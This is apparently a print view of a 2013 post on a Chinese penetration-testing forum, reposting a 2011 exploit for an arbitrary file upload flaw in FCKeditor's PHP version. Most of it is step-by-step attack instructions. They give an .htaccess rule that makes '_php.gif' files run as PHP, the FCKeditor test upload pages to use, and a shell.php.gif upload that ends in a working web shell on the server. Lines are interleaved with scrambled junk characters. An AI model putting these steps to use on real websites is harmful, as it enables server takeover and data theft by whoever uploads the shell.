中国网络渗透测试联盟

标题: FCKeditor所有php版本Upload上传漏洞 [打印本页]
作者: admin    时间: 2013-10-27 17:25
标题: FCKeditor所有php版本Upload上传漏洞
FCKeditor所有php版本Upload上传漏洞
$ S4 o! ~( L) |; r' A9 Q- B5 C作者:佚名 来源:本站整理 发布时间:2011-10-25 7:39:075 w, m, x. S2 \2 @* V8 x
减小字体 增大字体
( L% n; G) f" y* l' Z[+] Title:FCKeditor all versian Arbitrary File Upload Vulnerability4 J  X  y( e8 {$ f. P* e$ y+ I/ o
[+] Date: 2011& M4 ]% U1 i* L
[+] Author : sinesafe.cn. z) _8 m; c3 [$ _
[+] Website : WwW.sinesafe.cn
$ A1 O9 J8 \, h1 P———————————————————
4 A' \- p$ v0 y5 z1.create a htaccess file:2 G0 b% Q& w) j0 V+ y' s
code:( G! B3 M+ |( I' d$ a
<FilesMatch “_php.gif”>6 ]' e4 A# g5 y; H
SetHandler application/x-httpd-php2 ^0 T, u+ ]/ u9 n# E+ L! t# n
</FilesMatch>
; z9 j4 @4 n! U3 b$ \! q3 E% y" y, E8 O4 g7 {
2.Now upload this htaccess with FCKeditor.
3 i' x" x& v) q0 z6 H) e7 L) n% c/ d1 D' H) l, g  @
http://www.sinesafe.cn/FCKeditor ... er/upload/test.html
4 G/ V9 p$ U5 A) h7 Q  \
2 u& A' _5 c( t# M9 P# Thttp://www.sinesafe.cn/FCKeditor ... onnectors/test.html
3 }% y8 s! ?5 A: ~0 o6 Z
, Y- ]/ t  K& Y———————————————————————————————-- @& J; p, y  o- J
3.Now upload shell.php.gif with FCKeditor.
1 c  r9 \* r* S7 P4.After upload shell.php.gif, the name “shell.php.gif” change to “shell_php.gif” automatically.
" o% \  t7 P: _4 w1 P* @5.http://www.sinesafe.cn/anything/shell_php.gif
5 Z: J. \6 O: L' L- p9 E6.Now shell is available from server.
7 T, [6 I3 Z1 s( [
% E  s7 h7 z1 a  V5 A# v$ h5 e* |2 e* _
) K- S  f, Q0 ~( c




欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2